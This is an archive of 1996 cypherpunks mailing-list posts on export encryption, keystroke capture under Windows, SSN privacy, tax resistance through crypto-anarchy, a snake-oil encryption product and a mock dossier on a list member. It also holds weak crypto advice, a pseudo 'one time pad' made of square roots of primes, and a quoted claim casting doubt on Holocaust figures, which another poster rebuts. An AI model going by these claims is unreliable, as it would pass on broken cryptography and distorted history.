At 11:56 AM 11/11/96 -0800, Pablo Calamera wrote:

...
>The WebTV Network is currently using a 128 bit encryption system that
>gives our U.S. subscribers the most sophisticated security protection of
>any online service today. It is our intent to offer our customers the most
>secure environment for transactions and transmission with their WebTV
>Network service. Our units, sold by Sony and Philips, include a sticker
>that states that the product is not to be exported outside of the United
>States.
>
>However, the government restriction does not prevent us from exporting our
>product outside of the United States. WebTV Networks has always intended to
>announce its expansion plans in early 1997, providing global communication
>using either 40 bits, now authorized by the government, or 56 bits which
>Bill Clinton recently endorsed.
...
This may prove my ignorance, but I thought that the WebTV systems were going
to use a propiatory service.  I am assuming that this is true in this post.
If the WebTV product is using a propietory ISP for its operation, I assume
that WebTV sets sold outside of the United States will not be dialing up the
same phone number.  As the chip could easily communicate with the ISP, and
the ISP communicate, perhaps through standard credit validation systems,
with the merchants, why does the international version even need U.S.
developed encryption.  The international version could most likely be fitted
with the locally available strong encryption.  Since the WebTV ISP will
probably have a virtually private wide area network, the "foreign"
encryption could be replaced with a more standard type inside of the U.S.,
at the main offices.  Why give the U.S. government the ability to look at
the transaction information of non-U.S. citizens, off of U.S. soil.
If, however, the WebTV system does not have the ability to maintain contact
with its over-seas offices, this could be unfeasable.
Granted, this idea would mean that some computer would have access to all of
the relevant data,for the purpose of "trading" crypto, but I would rather
put my trust in a company, which I could easily quit dealing with, than the
U.S. government, which might easily institute an international sales tax system.
Can PGP be compiled to an EEPROM?  If so, PGP is well distributed and might
easily be accepted for online transactions, also, Mr. Zimmerman might be
willing to agree to a bulk liscense sale for the implemention of this idea.
Just make sure that the chip is loaded outside of U.S. borders.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Tue, 12 Nov 1996 17:39:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: two bogus messages to this list
Message-ID: <199611130139.RAA14021@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:08 PM 11/11/96 -0500, Ted Garret wrote:
...
>Microsloth has, at the heart of it's system, a call which traps ALL
>KEYSTROKES and EVENTS.  This call exists from Win32s on, and can be
>placed inside of a DLL which most users would have no idea was loaded.
>Even under NT, this DLL can be made to remain resident and trapping
>Keystrokes, events, and window contents.
>
>Does this just BEG to be exploited?
...
I use Windows 3.11.  Look at the Recorder in it.  Its designed to create
Macros.  It can be set up, by anyone, to capture passwords in Eudora.  I've
tried it in a controled environment (my own machine), it works.  The only
defense is if the person were to have h[is,er] password left in Eudora,
which is a serious mistake, or if that person Alt,Tabs through all of the
resident programs to make sure it wasn't running.  Half of the people I've
told this to didn't even know that you could switch between windows
programs, (one didn't even know that more than one windows program could be
active at the same time).  In an open lab environment, where the machines
are left on, and the common user can't navigate outside of windows, and then
only with the mouse, this would be a serious threat to privacy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Tue, 12 Nov 1996 17:39:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
Message-ID: <199611130139.RAA14024@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:26 AM 11/11/96 -0800, Hal Finney wrote:
...
>I have two kids entering their teens, and I'm sure other list members are
>parents as well.  What can we do for our children to help them enter their
>adult lives with better chances to retain privacy?  Unicorn mentions keeping
>them absent from school on picture day, although I'm not sure how much this
>helps.  I suppose it makes it harder for an investigator to find out what
>they look(ed) like.  Then when they get old enough to drive you have a new
>problem avoiding the photo (and thumbprint) on the license.
...
As far as the drivers linscense goes, there are religions that do not allow
its members to be photographed, and the government honers this,(at least the
Tag Offices do).  I don't know the name of the religion but I believe it is
a Christian one.  Convert once every four years to get your drivers
liscense, and convert back within the week.  No photograph on that little
piece of plastic.
P.S.  In Oklahoma, there is no thumbprint on the current liscense.
P.P.S  You can always send your child to school with a note saying that you
do not want your child in the class picture, I know of someone who did that,
(on a side-note, we always wondered why.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Tue, 12 Nov 1996 17:39:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: A really short one time pad.
Message-ID: <199611130139.RAA14035@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Actually, here are ten.
2^.5
3^.5
2^(1/3)
5^.5
5^(1/3)
7^.5
11^.5
13^.5
17^.5
Pi
For that patter the nth root of any prime number.
A lifetime of "pads" could be distributed in one trip.  Of course this still
means that you have to make the trip, and write down all of the above with a
referring codeword or number.
Cheap, I know.  Wonder if this type of "one time pad" is as foolproof as
truly randomly generated ones.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 12 Nov 1996 14:41:13 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
In-Reply-To: <199611121840.KAA04414@mail.pacifier.com>
Message-ID: <Pine.LNX.3.95.961112173925.907B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 12 Nov 1996, jim bell wrote:

> The way I see it, a positive statement in the Constitution that the Feds 
> have the power to coin money does not necessarily exclude other 
> people/banks/states/foreign countries from doing likewise.

Some localities in the U.S. are indeed minting their own currency.  Ithica is
one such example, I believe.  I don't know if these currencies are considered
"legal tender", but the Feds don't seem to be stopping it.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoj9UizIPc7jvyFpAQG7iAf/fE1M1xiYlX1iztuFLVQDUSX/beLKCIOP
bAvrzQSm+cKhN0xko/hT2XlWCPv1nZt9aiidOyWNdKwicAGzPuLpGa+i3DfR0DuV
GSggPQQKjkQugofpQ/eFSM8IJdk/eXPsEGl/AxUlBvWhLog0d9OnOWbfkNhWJEy7
Idf4eKzX450oXK/OoSp7Ik1DX0nZrqPtY2Y4KIcDL5nyUMR8eKzdFaIRi+6x1RmX
QCsN0oT7QvCtGAJfNCCo95svgA/eR5pT0zn8th0r0yWFLaZTI4A4O7kOkn30er+P
2PnFeAK6huzpVClckWIQvpCfjkbAdzLZFE2BmFHwdrElz/CJSstZqQ==
=UvzN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Tue, 12 Nov 1996 18:02:43 -0800 (PST)
To: MatriX Spider <matrix@citenet.net>
Subject: Re: Small question about the list
Message-ID: <1.5.4.32.19961113020039.003944c8@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I would be realy happy if someone could tell me the adress to remove my name
>from the distribution list.
>Could anyone send me the procedure on how to remove my name of the list ?

The two usual ways to do this on the internet are
1) Use the same address you used to join the list (you _did_ save it?)
2) somethinglist@somewhere.com is administered by
   somethinglist-request@somewhere.com (though this is often a frontend
   for some mailbot like majordomo or listserv @somewhere.com , and
   may just send you instructions for finding the real mailbot.)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 23:17:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611111831.KAA10148@toad.com>
Message-ID: <199611120717.SAA11709@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 12 Nov 1996 18:20:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Taxation Thought Experiment
Message-ID: <v02140b08aeaed39459af@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>The crypto-relevance is via crypto anarchy: we need to undermine the tax
>system enough that _everyone_, not just us, loses faith in it. (There could
>be a "straw that broke the camel's back" effect, if people lose confidence
>in the system. Even if most people are _not_ using anonymous digital cash
>to hide income, if _enough_ are (and this "enough" could be a visible
>minority, visible through recounts of their deeds), then confidence could
>be lost. As in Italy and other such places, where compliance rates on taxes
>are very low.)
>
>--Tim May
>

I've posed similar questions to friends and aquaintences.  The
working-class stiffs (who can't easily hide from the IRS) feel taxes are an
unwelcome but necessary burden in order to provide the blanket of
government protection they feel exists.  They resent and oppose widespread
tax fraud.  Self-employed tend to be more open to 'alternative' income
structuring.


PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear             | Internet: azur@netcom.com
Lamarr Labs              | Voice: 1-702-658-2654
7075 West Gowan Road     | Fax: 1-702-658-2673
Suite 2148               |
Las Vegas, NV 89129      |
---------------------------------------------------------------------

Internet and Wireless Development

Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne, Libertarian, for President.
http://www.harrybrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Tue, 12 Nov 1996 18:32:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: How many people killed by there own governments (Was: Re: a
In-Reply-To: <3.0.32.19961111182528.00a31d70@rpcp.mit.edu>
Message-ID: <32893307.5B5F@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
> 
> Joseph M. Reagle Jr. wrote:
> 
> > Do you have a breakdown of that number? I'm working on one of my
> > thought experiments and am looking for the appropriate stats:
> 
> [snip]
> 
> > Deaths by Govts. on "own people"
> 
> >   US Civil War     x M

I believe x is around 2, but it's a rather tortured argument to call 
that "government killing its own people." You had at least two 
governments going at it.

> As a war, not genocide per se, but you could include as many as 100
> million Africans killed in the slave trade, as long as the U.S. Park
> Police don't get dibs on verifying the official count. 

I've heard Farrakhan claim 500 million, but 100 million due to slavery 
and related colonialism seems credible. I also would not call this 
"governments killing their own people." For the most part, it was 
private enterprise. Slave traders were not exactly the cream of the 
intellectual elite.

> You might also include a large number of Chinese "laborers" in
> the 1800's.

The only conceivable connection to "governments killing their own 
people" I can think of is that railroad tycoon Leland Stanford was also 
a Senator at one point.

> >   US Native Americans
> 
> When I was in school in the 1950's and 1960's, the schools said there
> were no more than 3 million N.A.'s here circa 1600 or so.  The
> official count remains controversial.  BTW, since Columbus, the 
> Conquistadores, et al gutted much of Central and South America,
> include them too.

I'd have to ask John Morris on that.

> >   Hitler: Jews     6 M
> >   Hitler: Others   6 M
> 
> I wouldn't even bother with these two. The numbers are not that
> reliable, the topic is still way too hot for open research even
> today, and besides, all sides killed probably 100 million or better
> in WW2, most of them from purely terrorist bombing.  The significance
> of the "Holocaust" should not have been co-opted for commercial
> purposes as it has, but as they say, wishing don't make it so.

My. What a charmer you are. Please share these insights with the 
alt.revisionism crowd at your earliest convenience.

> >   Stalin:         30 M
> 
> 30 million is the "low" count, probably includes "hard" purges and
> identifiable political prisoners and very close associates, and 
> perhaps some family members.  Total unjustifiable non-war homicides on
> the part of the Stalin government (while Stalin in charge) may be 65
> million or thereabouts.

The 30 million figure comes from Robert Conquest, who worked for the 
British government writing anti-Soviet propaganda during and after the 
war. Nobody has ever accused him of underestimating Soviet 
atrocities. But playing rhetorical games with numbers of this magnitude 
is unseemly. I'll leave that to you guys. Suffice to say that Stalin was 
a monster, and Lenin was the same; there are scans of execution orders 
in Stalin's and Lenin's handwriting at 
http://sunsite.unc.edu/expo/soviet.exhibit/collect.html

> >   China: Cult Rev  x M
> 
> Similar comments as above - unjustifiable homicides on the behest of
> the Mao government (while Mao in charge) should be about 65 million.

Actually, the Cultural Revolution mostly enslaved people, rather than 
killing them. To get to 65 million you'd have to include the 
revolutionary and collectivization periods.

> Comment: The Guiness World Records were at one time or another a 
> source for some of this info, as was their original sources.  Do
> expect to see some disinformation thrown into the "real" documents.

Right. The Conspiracy touches everything. Even that authoritative 
historical journal the Guiness Book of Records.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Tue, 12 Nov 1996 18:35:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
Message-ID: <199611130235.SAA14796@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:14 PM 11/11/96 -0600, Igor Chudov wrote:

>This is an interesting topic. I apologize if my questions are too trivial,
>but here they are: 
>
>	1) Can a person without an SSN have a credit record? Some
>	   may say that a credit record is a bad thing to have,
>	   but I am still interested in a possibility.
>	2) Will private lenders (such as credit card issuers or
>	   mortgage companies) agree to extend credit to a person
>	   without an SSN or to someone who refuses to give out his SSN?
>	3) Will the state issue a driver's license to someone who does not
>	   have/does not wish to give out their SSN?
>	4) Will states' police (where applicable) approve purchases of
>	   firearms if purchasers do not state their ssn (misstating it
>	   may be a crime) on an application?
>	5) Employers are required to pay certain taxes and therefore
>	   they, in my understanding, need to know their employees SSNs.
>	   How can people get around that (unless they do not need to work)?
>	6) Can someone without an SSN obtain various kinds of insurance?
>
>It is my understanding that the law does not regulate use of social 
>security numbers between private parties. Businesses are free to refuse 
>to do business with someone who does not present them an SSN. In real 
>life, how inconvenient is life of a privacy-concerned individual?
>
>Say, John Anonymous is a young 15 years old who anticipates to become an
>engineer and have a middle class life. He wants to get married, have
>children, drive a car, obtain insurance, work at some big company,
>travel around the world, invest in mutual funds or buy stocks, and so
>on. Reliance on government help is not important to him, so he would not
>apply for an SSN solely to get Social Security, welfare and such.
>
>His parents are cypherpunks and did not obtain an SSN for John. How much 
>effort would it cost him to live a life outlined above?

He couldn't, at least not in Oklahoma.  In Oklahoma, students in public
schools are now required to have SSN's.  This may not apply to private
schools, but I imagine that it does, at least to some degree.  Having a high
school education is certainly necessary to gain the Masters necessary to be
an engineer.
However, getting a drivers liscense should be easy.  My sisters drivers
liscense number is one that was randomly generated, all because she did not
know her SSN off of the top of her head.  My drivers liscense number is the
same as my SSN, all because I know my state mandated serial number.  For all
practical purposes, I am Roach, Sean 447-xx-xxxx.  Note, 447 refers to the
state of my birth.  My sisters record is at least a little more convoluted.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 23:35:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611111626.IAA31552@crypt>
Message-ID: <199611120735.SAA12022@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 12 Nov 1996 18:36:33 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Taxation Thought Experiment
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961113023606Z-36582@INET-03-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Timothy C. May

The crypto-relevance is via crypto anarchy: we need to undermine the tax
system enough that _everyone_, not just us, loses faith in it. 
.........................................................


Having more of the facts about how taxation works - how it affects an
individual in certain examples, providing the kind of calculating which
both Tim and Joseph have gone through, should do it (bring about the
loss of faith).  

And Ross Perot would be the right person to communicate it, with his
charts and his detailed explanations  (so would Harry Browne, but he
doesn't yet have the cash for such advertising).  

Ross doesn't want to do away with taxes completely, but he is at least
interested in their making sense.

   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Mon, 11 Nov 1996 23:47:20 -0800 (PST)
To: meriman@amaonline.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611111636.IAA31569@crypt>
Message-ID: <199611120746.SAA12233@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 12 Nov 1996 18:56:06 -0800 (PST)
To: Ted Anderson <ota+@transarc.com>
Subject: Re: Black markets vs. cryptoanarchy
In-Reply-To: <wmW_81eSMV0=1A_040@transarc.com>
Message-ID: <199611130255.SAA25806@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I tend to agre with Ted Anderson's point that a shift
to cryptoanarchy will be a gradual process if it happens
at all. this is in total contrast to TCM who has, as
I recall, talked about "cryptoanarchy" as an example
of a phase discontinuity, i.e. an abrupt transition.

I personally would like to see a more specific description
of "cryptoanarchy" because it seems its originator is always
posting new messages about what it really is about, associating
it with new developments, and distancing it from areas of
stagnation or perceived criminality. a bit of "success 
has a thousand fathers, failure is an orphan" going on here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 12 Nov 1996 19:06:42 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Taxation Thought Experiment
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961113030429Z-36653@INET-01-IMC.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	azur@netcom.com

I've posed similar questions to friends and aquaintences.  The
working-class stiffs (who can't easily hide from the IRS) feel taxes are
an
unwelcome but necessary burden in order to provide the blanket of
government protection they feel exists.  They resent and oppose
widespread
tax fraud.  Self-employed tend to be more open to 'alternative' income
structuring.
.....................................................


Just before the elections I heard on NPR and read in an article in a
local newspaper, some people's stories of how they converted from
Democrat to Republican.

Most of them said that athough they were originally idealistic about all
the good things which government can do, when they started their own
businesses they were suddenly confronted with all the excruciating
regulation and rigmarole which any business must deal with on a daily
basis while just trying to get some work accomplished.   Very quickly
they realized the consequences of a lot of the government proposals
which they had heretofore supported.

So I realized that experience is not only the best teacher, but it is
also the best argument against bad cases of faith in government-run
economies.   Sometimes a person can't understand what the problem is
unless they've "been there", and once a person becomes self-employed,
starts a business, or becomes an investor in an enterprise, the light
dawns and they Understand.

I'm happy when I read that more and more of those people who are
"down-sized" or  layed off are turning to self-employment and starting
their own companies, because this means that more people will acquire
through direct experience (that is, confrontation with govmt agencies)
the details of real-life economics which were left out of high school &
college.  

And this means more economics&tax-savvy voters in existence for govmt
candidates to face in the elections.

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 00:06:16 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Returned mail: User Unknown
In-Reply-To: <c=US%a=_%p=Inference%l=LANDRU-961111183435Z-2357@landru.novato.inference2.com>
Message-ID: <199611120805.TAA12499@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 12 Nov 1996 11:22:01 -0800 (PST)
To: Steven Weller <cypherpunks@toad.com>
Subject: Re: More snake oil: ENIGMA
In-Reply-To: <v0300780daeae49989465@[206.86.1.35]>
Message-ID: <199611121922.MAA18356@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


        Other than the fact it is probably from a front for one of Dan 
    Lassiters' Little Rock companies, now owned by Alltel, it's worth
    a read. large scale enigma encoding is not bullet proof, but it can
    make your life miserable.  I did not take the time to calculate the
    permutations...  
        I wonder if anyone told them the data recovery teams can pull
    multiple layers of data off a disc after it has been stripped?
        FYR, the explanatory text from their front page is below.

--
    Cyberspace and Information are Freedom!  
        FUCK your WIPO, too. 
                -attila

      ======================  forwarded message ======================

<HTML><HEAD><TITLE>Enigma Welcome Page</TITLE></HEAD>
<CENTER>
<IMG SRC="eng2.gif"><BR><BR>

</CENTER><CLEAR=ALL><HR><BR>
<CENTER><B>Welcome to Enigma & Co.!</B></CENTER><BR>

The following text contains various terms that you may not be familiar with.
Please refer to the Glossary section for a description of those terms, or
feel free to call us for more detailed information on how we can help you with
your data security needs.<BR>

<BR>

A data protection system for businesses and individuals, the Enigma & Co.
related products offers security with the means to 
create personalized encryption schemes in an infinite variety.  In 
addition, the versions include a complete package of security 
management tools to enable it to be used in a business or office environment 
under the oversight of authorized administrators. It also provides routines 
to handle binary encryption and decryption of both text and non text files 
as well as all the capabilities needed to accommodate BBS, E-Mail and Internet 
communications.
It is for these reasons plus many more which you will discover in using the
software why our users think it is the finest cryptographic software ever
produced.<BR><BR>
In addition, unlike public key and other mathmatical cryptographic programs, there
is nothing in the messages and files you encrypt that aids in the deciphering of
your data.  If you encrypt twenty bytes, then the encrypted file is twenty bytes,
containing no clue on how to decipher it.<BR><BR>

<B><CENTER> About Enigma & Co.'s Cryptography Products</B></CENTER><BR>

Here's some insight into the enormous power and security offered by Enigma &
Company's products.  You do not need to know all the in's and out's of these
features to use it effectively.  We've designed our systems to be extremely
easy to use.  Some of the main features are:<BR><BR>

<B>Wheels:</B><BR> Our Enigma's can use from three up to eight wheels at a 
time.  A Wheel is a scrambled dataset of characters that is used by the Enigma
systems that your computer randomly creates.  There are
no limit to the number of WheelSets (datasets of wheels) that you can create.
<BR><BR>
<B>Usable Characters:</B><BR> Our Enigma uses 83 characters on its text wheels and 256 on
its binary wheels. This gives the Enigma user more than six billion more 
starting
text wheel configurations ("shifts") to choose from, each one of which
will produce an entirely different encryption.  The use of all eight
binary wheels, of course, exceeds this number tremendously. <BR><BR>

<B>Indicator Word:</B><BR> To make the enciphered message even more difficult
to break, our software provides another feature which allows the sender
to enter a word or a simple phrase that has the effect of adding a
virtual ninth wheel to the text enciphering combination.<BR><BR>

<B>Multiple Cryptions:</B><BR> Probably one of the best features of the Enigma
products, you have the means of storing your personalized WheelSets and your Schemes
and then do cryptions in a multiple fashion, using different
WheelSets, different Schemes, and if in text mode, different Indicator
words.  You can also Cross Crypt, that is encrypting in text (83
character) and then in binary (256 characters). <BR><BR>

<B>Parameters:</B><BR>We created even more power over the cryptive process by adding parameters 
for both Text and Binary which allow the user to define the direction the 
wheel in each slot will rotate, and the number of turns before it triggers 
the next wheel to rotate in its predetermined direction.  Predefined WheelSets 
and Schemes are also included as well as data files to save and restore 
parameter settings.
<BR><BR>

<B>Passes:</B><BR> The Enigma systems allow
the passing each character back and forth as many as 99 times, a device 
which effectively turns an eight wheel encryption to a 792 wheel encryption or
a 891 wheel encryption with an Indicator Word.
<BR><BR>

<B>Personal Schemes:</B><BR> Added to the above, the Enigma user is not confined
to the wheel "wirings" that come with this software. He or she is
encouraged to create personalized wheels and schemes, setups that can
be tailored for groups of correspondents or individuals. And to avoid
the possibility of using the wrong scheme with the wrong person, Enigma
allows each special setup to be given a separate file name for later
recall.<BR><BR>

<B>Slots and Shifts:</B><BR> Each user has the ability of placing different
wheels into the slots in whatever order they prefer and then shifting
them prior to the cryption process.  The act of shifting can in effect
create a totally different wheel from the original positions of that
wheel.<BR><BR>

<B>Shift Ratios:</B><BR> To further complicate the encryption process you can
specify the number of shifts the wheels will rotate when it is triggered instead
of only one rotation.<BR><BR>
 
<B>System Files:</B>All your system files can be removed (cannot be recovered),
transferred and restored either all at once or individually.  The system files
consist of WheelSets, Schemes, Parameters and Code Book data. 
<BR><BR>

<CENTER><B> About Enigma & Company's Ultra Enigma</B></CENTER><BR>

The Ultra Enigma system evolved by the addition of a ten numeric input 'key' 
in the parameter screen.  These ten sets of numbers are used to 'shotgun' the original
message anywhere between eight and five hundred plus times its size, depending
on the values in those ten 'key' inputs.  Ultra hides your data in a sea of
data, thus making decoding by brute force an absolute nightmare.
<BR><BR>

As our system evolved, three modes of cryption were developed and all three
are present in Ultra Enigma and can be utilized as part of the operating system. 
Styles 1 and 2 are one-to-one processing (files are not expanded).<BR><BR>

In addition, all sensitive data files used by Ultra Enigma can be Transferred,
Restored and Killed (unrecovering them are impossible) leaving your computer
useless to theft and misuse.<BR><BR>
 
</BODY></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Open Net Postmaster <postmaster@opennet.net.au>
Date: Tue, 12 Nov 1996 00:11:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Returned mail: User Unknown
In-Reply-To: <199611111718.JAA31638@crypt>
Message-ID: <199611120811.TAA12561@rainy-day.openweb.net.au>
MIME-Version: 1.0
Content-Type: text/plain



The address you mailed to is no longer valid.
This is probably because the user in question was an
old Open Net subscriber. Open Net is NO LONGER an ISP,
and has not been since May 1996.

We have no redirection address for that user. Please
remove them from any mailing lists you might have.

This response was generated automatically.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 12 Nov 1996 19:11:19 -0800 (PST)
To: Rick Smith <cypherpunks@toad.com
Subject: Dossier on Rick Smith is Easily Obtainable
In-Reply-To: <199611122141.PAA27619@shade.sctc.com>
Message-ID: <v03007800aeaeeabb71b7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:41 PM -0600 11/12/96, Rick Smith wrote:

>When faced with peculiar situations I try to choose a disclosure that
>meets whatever the immediate requirements are but doesn't make it easy
>to automatically match up records. Often the best you can do is reduce
>certainty and increase the likelihood of multiple matches with other
>records. It doesn't hurt if you last name is Smith here in the U.S.A.

Hardly very effective, Mr. Rick Smith. You are not nearly so anonymous as
you seem to think. Your "Smith" disguise falls apart in a few cycles of a
Pentium.

(And bit rot is rarely effective...trust me. With XORs and comparisons,
even highly damaged records will be trivially reconstructable, with a
ruthless efficiency that will give capabilities 10 years from now that will
stun nearly everyone on this list. Deja News and Alta Vista on 10 years of
steroids, located offshore to enable regulatory arbitrage.)

To illustrate, let me call up my BlackNet Dossier Service entry on you.
www.black.net... I'll just pick _part_ of your entry, from exactly 30 years
ago:

[,,,,much stuff about Mr. Smith elided....]

....1966-67, student, Langley H.S., Langley, VA...interest in "Cretaceous
extinction" [Agency note: this interest in "extinction"...is it abnormal,
or just precocious?]...known to associate during this year with
troublemakers, incl. J. Landua, W. Winkowski, and [deleted for security
reasons by ONI]...

...

So, Mr. Smith...is the dossier entry basically correct? Were you in fact
living near Langley? Why? Is it true that your high school was on the other
side of the fence from the CIA?

Nationally enquiring minds want to know.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 12 Nov 1996 19:32:57 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <Pine.SUN.3.94.961110173517.12339E-100000@polaris>
Message-ID: <199611130331.TAA28661@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I'm sure some clever participant at DCSB will do a pile of homework before
>coming to my talk and put it all together.  So be it.  If he or she is
>polite, they might chide me in private a bit, but not blather all over the
>list just to show how very clever they were.  As long as they enjoy the
>talk, I'm not overly concerned.

or then again, maybe they'll sell it to BLACKNET!! <g>

actually Unicorn, eventually voice analysis software may
evolve to the point that someone could match people
based on their voices to public speech databases, and you
could be nailed through your phone conversations. hmmmm, have you
ever had a conversation with someone who might have been
taping you for amusement?

(heh. you write a long, self-indulgent letter about the extremes
you have gone to keep your ID secret, and pretend to be blase' &
nonchalant if someone discovers it? I think I can see through
that smokescreen.)

actually, I heard this interesting rumor that Unicorn threatened
to sue someone who "defamed" his pseudonym. quite an amusing
story if true, given his last essay that talks about how he
created the pseudonym in the first place to avoid exactly what
it accomplishes, i.e. dissociating his professional identity
from the "lunatic anarchist" writhing beneath the surface.

actually, there are some amusing things going on here with cpunk
"rules." are cpunks in favor of pseudonyms or not? one famous
cpunk madman wrote under a pseudonym to the list, and many
cypherpunk went to great lengths to try to derive his identity.
is this a case of respecting pseudonyms? or is it more a case of
the double standard at best, hypocrisy at worst, 
"respect my pseudonyms, but yours are fair game"?  

one noted proponent of pseudonymity, whom we will merely call "Timmy", 
regularly takes great glee in misattributing my own posts to some 
deranged crackpot running loose in cyberspace. is this a case
of respecting my identity? suppose I really was this person-- 
shouldn't Timmy's position be one of respect for my use of
a pseudonym? of course he is too immature and feebleminded to
even consider this discrepancy in his philosophy. cpunks are
not known for having coherent philosophies that answer simple
